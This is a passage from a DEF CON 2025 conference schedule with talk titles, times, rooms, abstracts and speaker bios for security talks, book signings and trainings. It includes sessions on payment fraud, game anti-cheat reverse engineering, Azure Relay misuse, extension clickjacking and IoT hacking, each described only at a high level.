Aamiruddin Syed is Cybersecurity Professional with over decade in years of experience in the industry. He specializes in DevSecOps, Shift-Left Security, cloud security, and internal penetration testing. He authored book titled "Supply Chain Software Security-AI, IoT, Application Security" with Apress/Springer. He has extensive expertise in automating security into CI/CD pipelines, developing security automation, and building security into infrastructure as code. He has worked on securing cloud platforms by applying security best practices to infrastructure provisioning and configuration. Leveraging his penetration testing skills, he routinely conducts targeted internal assessments of critical applications and systems to proactively identify risks. He excels at bridging the gap between security and engineering teams to enable building security directly into products.A recognized advocate for secure development, Aamiruddin is a frequent speaker and session chair at leading industry conferences including RSA Conference, DEFCON, and Black Hat.

Payment method: Zelle, Wire transfer

SpeakerBio:  Aamiruddin Syed

Aamiruddin Syed is Cybersecurity Professional with over decade in years of experience in the industry. He specializes in DevSecOps, Shift-Left Security, cloud security, and internal penetration testing. He authored book titled "Supply Chain Software Security-AI, IoT, Application Security" with Apress/Springer. He has extensive expertise in automating security into CI/CD pipelines, developing security automation, and building security into infrastructure as code. He has worked on securing cloud platforms by applying security best practices to infrastructure provisioning and configuration. Leveraging his penetration testing skills, he routinely conducts targeted internal assessments of critical applications and systems to proactively identify risks. He excels at bridging the gap between security and engineering teams to enable building security directly into products. A recognized advocate for secure development, Aamiruddin is a frequent speaker and session chair at leading industry conferences including RSA Conference, DEFCON, and Black Hat.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 15:00-15:59 PDT


Title: Book Signing - The Browser Security Field Manual Adeline - Audrey Adeline
When: Saturday, Aug 9, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Audrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping

Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.

SpeakerBio:  Audrey Adeline

Audrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 14:00-14:59 PDT


Title: Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse
When: Saturday, Aug 9, 14:00 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.

With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.

As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.

For more about Garrett visit https://GarrettGee.com

SpeakerBio:  Garrett Gee

Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.

With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.

As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 15:00-15:59 PDT


Title: Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 4 - Map

Description:

Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.

With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.

As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.

For more about Garrett visit https://GarrettGee.com

SpeakerBio:  Garrett Gee

Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.

With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.

As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 12:00-12:59 PDT


Title: Book Signing - Travis Goodspeed/No Starch Press
When: Friday, Aug 8, 12:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall4-Vendors-V301 Book Signings-Table 1 - Map

Description:
SpeakerBio:  Travis Goodspeed
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 16:30-17:30 PDT


Title: Brazil's aPIXcalypse - How real time payments turned Brazilian threat scenario into a nightmare
When: Saturday, Aug 9, 16:30 - 17:30 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:

Back in 2020 the Brazilian Central Bank launched PIX, a real time wire transfer and payment protocol that has been adopted by the Brazilian population, and nowadays PIX represents the most used payment method in the country. However, local cybercriminals quickly adapted and leveraged PIX for malicious activity. Since then, criminal activity in Brazil has ramped, from kidnapping, stealing of mobile phones, to money laundering "on steroids" and targeted banking trojans. Instant wire transfers made fraudulent transactions run faster than the speed of light, and were almost impossible to stop and to recover the stolen funds. A criminals' paradise. In this presentation we will discuss the fraud schemes that were fueled by PIX and the ones that emerged since then, haunting the local population.

SpeakerBio:  Anchises Moraes, Cyber Threat intel Lead at APURA Cyber Intelligence SA

Lord Anchises Moraes Brazilborn of the house Hacker, First of His Name, Born in Computer Science, Cybersecurity Work-aholic, Lead of Threat Intel Realm, founder of Security BSides São Paulo, Supreme Chancellor of Garoa Hacker Clube, He for She volunteer at WOMCY (LATAM Women in Cybersecurity), Mente Binária NGO Counselor, Security Specialist and Protector of the Cyber Space realm.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 10:00-10:30 PDT


Title: Break Systems, Not Promises: I promised to do a keynote at DEF CON
When: Friday, Aug 8, 10:00 - 10:30 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Lena "LambdaMamba" Yu, CEO at World Cyber Health
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 11:30-12:15 PDT


Title: Breakin 'Em All – Overcoming Pokemon Go's Anti-Cheat Mechanism
When: Saturday, Aug 9, 11:30 - 12:15 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

It was the summer of 2016, and like everyone else, I was out playing Pokémon Go. Except my rural location barely spawned anything interesting. Naturally, I dove into the game's code, reverse engineered its protocol, and built a custom Pokémon scanner.

But the story doesn't end there. One day, a switch was flipped, enabling a fancy new anti-cheating feature that locked out any custom implementations.

In this talk, I'll begin by exploring how mobile games like Pokémon Go handle communication through specialized protocols—and how I replicated that behavior to build a scanner. Then, I'll walk you through a 4-day hacking marathon where I teamed up with a group of like-minded enthusiasts to overcome the anti-cheating mechanism that nearly broke our scanners.

We'll examine how mobile games attempt to thwart such applications, unraveling the anti-cheating mechanism that was deployed by Pokemon Go. We'll explore how we managed, through obfuscated cryptographic functions, unexpected use of smartphone peripherals and hidden protobuf definitions, to break the anti-cheating system and release a publicly available API for the game's protocol.

Almost a decade later, the full story is ready to be told. Join me for an inside look at the anti-cheating mechanisms of online mobile games—and how to hack them.

References:

SpeakerBio:  Tal Skverer

In the past decade, Tal turned his hacking hobby into a career. His experience covers reverse engineering, malware analysis, embedded security, web hacking, cryptography, and computational complexity. He also teaches a biannual workshop on assembly, reverse engineering x86/x64, and blackbox research.

Tal hold an M.Sc. in Theoretical Computer Science from the Weizmann Institute.

Currently, Tal is the Head of Research at Astrix Security, where, among other things, he discovers vulnerabilities in how cloud providers implement connectivity between (and by) non-human identities.

Some of things Tal did in a past: Hacked vehicle infotainment systems at his previous job Was a part of the “Unknown6” research group that broke PokemonGo’s anti-cheating system in 2016. Turned a OnePlus 5T whose screen he accidentally broke into an ad blocker for my home network, as well as a meta search engine focused on ultimate privacy. Presented at several conferences including DEFCON, RSAC, BSides, and OWASP chapters. Conducted an open-heart surgery on a (1 month off warranty) Nintendo Switch to replace a defective part, which highlights the importance of the “Right to Repair” movement.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 17:00-17:59 PDT


Title: Breaking In: Real Paths Into Cybersecurity from Hackers, Humans, and Hiring Pros
When: Saturday, Aug 9, 17:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Trying to break into cybersecurity? Forget the hype. This panel cuts through the noise to show you what actually works: what roles are out there, what skills and certs are worth your time, how to build a real resume, and how to find your people in the community. We’ll talk job hunting, self-study, mentorship, influencers (the good and the grifty), and how to avoid wasting time and money. Ends with an open Q&A. No gatekeeping. No fluff.

Speakers:Eva Benn,Rosie "Lady Cyber Rosie" Anderson,Tib3rius

SpeakerBio:  Eva Benn, Security Project Manager at Microsoft Security

Eva Benn is a Principal Security Program Manager for the Microsoft Security and Response center. Eva has spent more of her security in red teaming and penetration testing, both as a people leader and hands-on practitioner. Before joining Microsoft, she worked in Big 4 cybersecurity consulting, leading global penetration testing and cybersecurity initiatives across various industries. She is a globally recognized security leader, holding an extensive list of industry certifications, including CISSP, CEH, CCSP, Security+, GSEC, GCIH, GSTRT, GPEN, GWAPT, GRTP, etc.

SpeakerBio:  Rosie "Lady Cyber Rosie" Anderson, Organiser at Manchester2600

Rosie Anderson is Head of Strategic Solutions for th4ts3cur1ty.company AKA Magical Genie Person. Having previously spent two decades talking to businesses to solve their hiring challenges, and helping people to break into cyber security as a recruiter, Rosie now uses those skills to help businesses solve their cybersecurity challenges. Rosie also founded BSides Lancashire, is a Director of BSides Leeds and restarted the Manchester 2600 Hacker Community, the only 2600 to be run by two women in its 40 year history. She was awarded Most Inspiring Woman in Cyber Security for 2024 and Cyber Newcomer for 2025.

Rosie has been a mentor for Capslock a cyber training programme for over two years, and is also part of the Ethical Council for Hacking Games. Giving back is important to her, and she loves the pay-it-forward mentality.

SpeakerBio:  Tib3rius, Cybersecurity Content Creator

Tib3rius is a professional penetration tester who specializes in web application hacking, though his background also includes network penetration testing. He is OSCP certified, and likes developing new tools for penetration testing, mostly in Python. He helps run an OSCP prep discord server, and enjoys passing on his knowledge to students who have a passion for information security.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 13:00-13:59 PDT


Title: Breaking the Chain: Advanced Offensive Strategies in the Software Supply Chain
When: Saturday, Aug 9, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Malicious packages have grown 156% YoY for supply chain security and supply chain attacks cost organizations $41 billion in 2023 (projected to reach $81 billion by 2026). This session underscores the urgent need to re-examine our defensive postures for software supply chain security by taking an offensive security perspective.

Speakers:Roni "lupin" Carta,Adnan Khan

SpeakerBio:  Roni "lupin" Carta, Lupin & Homes

Roni Carta, known as Lupin and co-founder of Lupin & Holmes, is an ethical hacker specializing in offensive cybersecurity, with a strong background in bug bounty hunting, including a $50,000 reward for hacking Google AI, red teaming at ManoMano, and significant research into software supply chain vulnerabilities, notably presenting at DEF CON 32 and recently reporting a hack of Google's AI Gemini; his diverse technical skills range from ATO and RCE exploits to supply chain security, earning him recognition in various cybersecurity competitions.

SpeakerBio:  Adnan Khan, AWS
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 11:30-12:15 PDT


Title: Breaking Wi-Fi Easy Connect: A Security Analysis of DPP
When: Sunday, Aug 10, 11:30 - 12:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Wi-Fi Easy Connect is a protocol introduced by the Wi-Fi Alliance as the core replacement for Wi-Fi Protected Setup (WPS). It is designed to simplify device provisioning using user-friendly methods such as QR code scanning or short-range wireless technologies like NFC and Bluetooth. In this paper, we present a comprehensive security and privacy assessment of Wi-Fi Easy Connect (version 3.0).

Our analysis uncovered several security issues, including aspects of the protocol’s design that may unintentionally expand the attack surface compared to WPS. Notably, we found that design choices intended to enhance usability can compromise security. All identified issues were disclosed to the Wi-Fi Alliance, and we incorporated their feedback regarding mitigations and risk acceptance into our evaluation.

This work underscores the critical balance between usability and security in protocol design and the dangers of prioritizing ease-of-use at the expense of robust security guarantees.

References:

  1. Wi-Fi Alliance.Wi-Fi Protected Setup (WPS) Specification version 1.0h. 2006. link (2015)
  2. Viehbck, S.: Wi-Fi Protected Setup online pin brute force vulnerability (2011)
  3. Wi-Fi Alliance. Device provisioning protocol (dpp) specification, Technical Specification, Wi-Fi Alliance, Latest Version. link (2025). Accessed 02 Jan 2025
  4. Wi-Fi Alliance. Wi-Fi Alliance product finder. link. Accessed 07 Jan 2023
  5. Group, N.: Ble proximity authentication vulnerable to relay attacks. Available: link (2023). Accessed 02 Jan 2025
  6. Nobles, P.: Vulnerability of IEEE802.11 WLANs to MAC layer DoS attacks. In: IET Conference Proceedings, pp. 14–14(1). link (2004)
  7. Bernstein D.J., Hamburg, M., Krasnova, A., Lange, T.: Elligator: elliptic-curve points indistinguishable from uniform random strings. In: Proceedings of the 2013 ACM SIGSAC conference on Computer & Communications Security, pp. 967–980 (2013)
  8. WiFi Alliance: WPA3 specification version 1.0. Available: link
  9. Vanhoef, M., Ronen, E.: Dragonblood: analyzing the dragonfly handshake of WPA3 and EAP-pwd. In: IEEE Symposium on Security & Privacy (SP). IEEE (2020)
  10. Chatzisofroniou, G., Kotzanikolaou, P.: Association attacks in IEEE 802.11: exploiting WiFi usability features. In: Proceedings of the International Workshop on Socio-Technical Aspects in Security and Trust (STAST). Springer , pp. 107–123 (2019)
  11. National Institute of Standards and Technology (NIST): A closer look at revocation and key compromise in public key infrastructures. National Institute of Standards and Technology, Tech. Rep. link (2023). Accessed 02 Jan 2025
  12. IEEE Standard for Local and Metropolitan Area Networks–PortBased Network Access Control, IEEE Std. 802.1X-2010. link (2010)
  13. Common Vulnerability and Exposure database: CVE-2022-37660. link (2022)
  14. Rondon, L.P., Babun, L., Aris, A., Akkaya, K., Uluagac, A.S.: Survey on enterprise internet-of-things systems (e-iot): a security perspective. Ad Hoc Networks, vol. 125, p. 102728. link (2022)
  15. Vanhoef, M., Piessens, F.: Key reinstallation attacks: Forcing nonce reuse in wpa2. In: Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security, ser. CCS ’17. ACM, New York, NY, USA, pp. 1313–1328. link (2017)
  16. Vanhoef, M.: A time-memory trade-off attack on wpa3’s sae-pk. In: Proceedings of the 9th ACM on ASIA Public-Key Cryptography Workshop, ser. APKC ’22, pp. 27–37. Association for Computing Machinery, New York, NY. link (2022)
  17. Marais, S., Coetzee, M., Blauw, F.: Simultaneous deauthentication of equals attack. In: Wang, G., Chen, B., Li, W., Di Pietro, R., Yan, X., Han, H. (eds.) Security, Privacy, and Anonymity in Computation, Communication, and Storage, pp. 545–556. Springer, Cham (2021)
  18. Kampourakis, V., Chatzoglou, E., Kambourakis, G., Dolmes, A., Zaroliagis, C.: Wpaxfuzz: sniffing out vulnerabilities in wi-fi implementations. In: Cryptography, vol. 6, no. 4. link (2022)
  19. Chatzoglou, E., Kambourakis, G., Kolias, C.: How is your WiFi connection today? DoS attacks on WPA3-SAE. J. Inf. Secur. Appl. 64, 103058 (2022)
  20. Chatzisofroniou, G., Kotzanikolaou, P.: Exploiting WiFi usability features for association attacks in IEEE 802.11: attack analysis and mitigation cont
SpeakerBio:  George "sophron" Chatzisofroniou

George Chatzisofroniou is a computer security researcher and engineer specializing in Wi-Fi and wireless network security. He has conducted infrastructure and software security testing for Fortune 500 companies across Africa, Asia, Europe, and North America. His research has been presented at leading security conferences and has attracted media coverage for uncovering critical protocol-level vulnerabilities.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-13:50 PDT


Title: Bridge to Nowhere Good: When Azure Relay becomes a Red Teamer's highway
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

We have exposed critical offensive capabilities in the azbridge tool, which has been available in Microsoft Azure's GitHub repository since 2018. This tool is a legitimate utility connecting network-isolated assets. Our research demonstrates how an attacker can weaponize this tool using its default configuration.

azbridge supports attackers in establishing covert C2 channels, exfiltrating data, and enabling lateral movement while evading scrutiny by perimeter defenses. It leverages back-end services that serve Azure Relay endpoints (*.servicebus.windows.net) and encapsulates malicious traffic in TLS-encrypted connections to *.cloudapp.azure.com endpoints, defeating egress filtering and proxy inspection.

We demonstrate how attackers can use it to maintain persistent network access, bypass network security controls, and conduct post-exploitation using Microsoft's tool. More sophisticated adversaries can re-implement the functionality of this tool in their tradecraft (e.g., implants). For our defensive side friends, we provide initial recommendations on recognizing these techniques to defend against adversaries exploiting legitimate infrastructure.

While not a 0-day, as of 03/14/2025, there are no reports of adversaries using azbridge, and no researchers have reported this tool’s potential for abuse. Therefore, we believe it is a novel use case or at least one that has not been publicly discussed.

Speakers:Edward Landers,Josh Huff,Robert Pimentel

SpeakerBio:  Edward Landers

Edward is a red teamer and former offensive security consultant focused on adversary simulation, malware development, and social engineering. He works on bypassing security controls, evading detection, and testing the limits of modern defenses. When he’s not on an engagement, he’s refining techniques, building tools, and keeping up with the ever-changing security landscape.

SpeakerBio:  Josh Huff

Josh

Josh is an offensive security professional with more than 10 years in Information Security. He has an Associate's Degree in Computer Forensics and Security, as well as several certifications. He began his professional career in IT as a contractor for the US Army Corps of Engineers before moving to his current company where he has held roles both on the defensive and offensive sides of security.

When not in the office Josh satisfies his curiosity exploring Red Team Infrastructure and Open Source Intelligence. He is a husband, father of two, and enjoys playing multiple instruments. Want an OSINT challenge - see if you can find his account for live streaming music.

Currently Josh is Senior Red Team Operator at a fortune 50 insurance company.

SpeakerBio:  Robert Pimentel

Robert is a seasoned offensive security professional with more than a decade of experience in Information Security. He started his career in the U.S. Marine Corps, working on secure telecommunications. Robert holds a master's degree in Cybersecurity, numerous IT certifications, and a background as an instructor at higher education institutions like the New Jersey Institute of Technology and American University.

Robert is committed to sharing his knowledge and experiences for the benefit of others. He enjoys Brazilian steakhouses and cuddling with his pugs while writing Infrastructure as Code to automate Red Team Infrastructure.

Robert currently serves as a Red Team Lead at Humana, Inc.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: BRIDGING THE GAP - An Introduction to IoT Security from Serial to Bluetooth
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Dive into the world of hardware hacking with this intensive, hands-on class that bridges the gap between software security and physical hardware. Over the course of two action-packed days, you'll learn to identify and exploit vulnerabilities common in IoT devices, medical equipment, and embedded systems. Starting with hardware basics and circuit board analysis, you'll quickly progress to mastering essential interfaces like UART, SPI, and JTAG. Get hands-on experience with industry software tools while learning to extract firmware, bypass authentication systems, and analyze Bluetooth Low Energy (BLE) implementations. Perfect for security professionals, researchers, and hardware enthusiasts, this course combines real-world case studies with practical exercises using actual devices. You'll leave equipped with a solid foundation in hardware security assessment, understanding common attack vectors, and knowing how to integrate hardware security testing into your product development lifecycle. Bring your curiosity - we'll provide the hardware!

Speakers:Will McCardell,Garrett Freibott,Cody Hein,Aaron Wasserman

SpeakerBio:  Will McCardell, Lead Offensive Security Engineer at Praetorian

Will McCardell is a Lead Offensive Security Engineer at Praetorian and a member of the IoT Penetration Testing team. He has a decade of software engineering and offensive security experience as well as a deep passion for hardware testing.

SpeakerBio:  Garrett Freibott, Senior Security Engineer at Praetorian

Garrett Freibott is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. He has experience in open-source software development, application penetration testing, and enterprise software security. Garrett has a B.S. in Computer Science from Arizona State University and the OSCP.

SpeakerBio:  Cody Hein, Senior Security Engineer at Praetorian

Cody Hein is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. His background includes audio video systems engineering and US Army Space operations, including SATCOM and other RF communications. He specializes in hardware reverse engineering, firmware analysis, and RF wireless communications with a focus on securing connected devices. Cody is passionate about lifelong learning and dedicated to sharing knowledge with others.

SpeakerBio:  Aaron Wasserman, Senior Security Engineer at Praetorian

Aaron Wasserman is an accomplished IoT penetration tester with a passion for uncovering hardware vulnerabilities. He is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. Aaron is dedicated to advancing cybersecurity practices and sharing knowledge within the community. He holds both a Masters and Bachelor’s from Georgia Tech's School of Electrical and Computer Engineering and also several offensive security certifications including the ACIP and OSCP.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: BRIDGING THE GAP - An Introduction to IoT Security from Serial to Bluetooth
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Dive into the world of hardware hacking with this intensive, hands-on class that bridges the gap between software security and physical hardware. Over the course of two action-packed days, you'll learn to identify and exploit vulnerabilities common in IoT devices, medical equipment, and embedded systems. Starting with hardware basics and circuit board analysis, you'll quickly progress to mastering essential interfaces like UART, SPI, and JTAG. Get hands-on experience with industry software tools while learning to extract firmware, bypass authentication systems, and analyze Bluetooth Low Energy (BLE) implementations. Perfect for security professionals, researchers, and hardware enthusiasts, this course combines real-world case studies with practical exercises using actual devices. You'll leave equipped with a solid foundation in hardware security assessment, understanding common attack vectors, and knowing how to integrate hardware security testing into your product development lifecycle. Bring your curiosity - we'll provide the hardware!

Speakers:Will McCardell,Garrett Freibott,Cody Hein,Aaron Wasserman

SpeakerBio:  Will McCardell, Lead Offensive Security Engineer at Praetorian

Will McCardell is a Lead Offensive Security Engineer at Praetorian and a member of the IoT Penetration Testing team. He has a decade of software engineering and offensive security experience as well as a deep passion for hardware testing.

SpeakerBio:  Garrett Freibott, Senior Security Engineer at Praetorian

Garrett Freibott is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. He has experience in open-source software development, application penetration testing, and enterprise software security. Garrett has a B.S. in Computer Science from Arizona State University and the OSCP.

SpeakerBio:  Cody Hein, Senior Security Engineer at Praetorian

Cody Hein is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. His background includes audio video systems engineering and US Army Space operations, including SATCOM and other RF communications. He specializes in hardware reverse engineering, firmware analysis, and RF wireless communications with a focus on securing connected devices. Cody is passionate about lifelong learning and dedicated to sharing knowledge with others.

SpeakerBio:  Aaron Wasserman, Senior Security Engineer at Praetorian

Aaron Wasserman is an accomplished IoT penetration tester with a passion for uncovering hardware vulnerabilities. He is a Senior Security Engineer at Praetorian and a member of the IoT Penetration Testing team. Aaron is dedicated to advancing cybersecurity practices and sharing knowledge within the community. He holds both a Masters and Bachelor’s from Georgia Tech's School of Electrical and Computer Engineering and also several offensive security certifications including the ACIP and OSCP.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 15:00-15:45 PDT


Title: Browser Extension Clickjacking: One Click and Your Credit Card Is Stolen
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Browser extensions have become increasingly popular for enhancing the web browsing experience. Common examples are ad blockers, cryptocurrency wallets, and password managers. At the same time, modern websites frequently display intrusive elements, such as cookie consent banners, newsletter subscription modals, login forms, and other elements that require user interaction before the desired content can be displayed.

In this talk, I will present a new technique based on clickjacking principles that targets browser extensions, where I used fake intrusive elements to enforce user interaction. In my research, I tested this technique on the 11 most widely used password managers, which resulted in discovering multiple 0-day vulnerabilities that could affect tens of millions of users. Typically, just one click was required from a user to leak their stored private information, such as credit card details, personal data or login credentials (including TOTP). In some cases, it could lead to the exploitation of passkey authentication.

The described technique is general and can be applied to browser extensions beyond password managers, meaning other extensions may also be vulnerable to this type of attack. In addition to describing several methods of this technique, I will also recommend mitigations for developers to protect their extensions against this vulnerability.

SpeakerBio:  Marek Tóth

Marek Tóth is a security researcher from the Czech Republic specializing in web application security. In his free time, he conducts independent research or reports critical vulnerabilities that could be exploited by attackers, with a recent focus on Czech companies. He shares interesting findings on his personal website, youtube channel or presents them at conferences, primarily at OWASP Chapter meetups.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 11:00-11:59 PDT


Title: BT hacking
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Dan Bongiorno
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 13:30-13:59 PDT


Title: Bug Bounty Village Closing Ceremony
When: Sunday, Aug 10, 13:30 - 13:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Final words, thanks, and giveaways.

SpeakerBio:  Bug Bounty Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 13:00-13:30 PDT


Title: Bug Bounty Village CTF Awards
When: Sunday, Aug 10, 13:00 - 13:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Join us at the Bug Bounty Village for the CTF Award Ceremony, where we celebrate the top performers of our inaugural Capture The Flag competition. During this in-person ceremony, we’ll recognize the highest-ranking participants on the leaderboard and award prizes to those present. If you’ve competed in the CTF and secured a spot on the leaderboard, make sure to attend and claim your prize! This is a unique opportunity to honor the skill and creativity of the global hacking community and to connect with fellow researchers and organizers. We look forward to seeing you there!

Speakers:Bug Bounty Village Staff,CTF.ae

SpeakerBio:  Bug Bounty Village Staff
No BIO available
SpeakerBio:  CTF.ae
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 12:00-12:59 PDT


Title: Bug Bounty Village CTF Walkthrough
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

CTF.ae will perform a CTF Walkthrough Session, where they'll dive into some of the most interesting challenges from our inaugural Capture The Flag competition. In this session, we'll showcase a selection of the vulnerabilities hidden in the competition’s ecosystem — spanning web, API, and LLM assets — and demonstrate how they could be discovered and exploited. Whether you participated in the CTF or are just curious to learn, this is a great chance to see real-world techniques and creative solutions in action, explained by the creators themselves.

SpeakerBio:  CTF.ae
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 10:00-10:59 PDT


Title: Bug Bounty Village Social Hour
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Come hang out with us in the village as we start Sunday morning off easy.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 17:00-17:45 PDT


Title: Building a Malware Museum
When: Friday, Aug 8, 17:00 - 17:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Culture isn’t just found in galleries or libraries - it lives in code, on screens, and sometimes, in the viruses that once infected our machines. Building a Malware Museum tells the story behind creating the world’s first online Malware Museum and its evolution into the Museum of Malware Art in Helsinki.

Only we can save the culture of our time. And our culture is digital. Preserving digital culture is hard: Software rots. Hardware vanishes. File formats die. And some digital artifacts - like computer viruses - were never meant to survive.

Mikko Hypponen has been archiving malware since 1991, originally for research - but today, this collection also holds cultural value. These digital fossils now offer a glimpse into a forgotten world of underground creativity, early hacking culture, and unintended digital aesthetics. Thanks to modern emulation techniques, it’s now possible to safely relive how those early viruses looked, sounded, and behaved.

In November 2024, Mikko opened the world's first Museum of Malware Art, in Helsinki. This art museum features modern art commissioned from artists around the world, all inspired by malware or cyber attacks.

This is a journey through preservation, nostalgia, and the art of archiving what was never meant to last. Because even malware is part of our history.

References:

SpeakerBio:  Mikko Hypponen

Mikko Hypponen is a global security expert who has been working in malware research since 1991. He is currently the Chief Research Officer at WithSecure, a Helsinki-based security company. Mikko has published his research in The New York Times, Wired, and Scientific American. He has lectured at Oxford, Harvard, and MIT. Mr. Hypponen's research team was the first to locate, analyze, and develop protection against the ILOVEYOU email worm - the largest malware outbreak in history. Mikko is also the curator for The Malware Museum at The Internet Archive and for The Museum of Malware Art in Helsinki.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 13:00-14:50 PDT


Title: Building Your First Windows Malware Loader
When: Saturday, Aug 9, 13:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

[Overview]

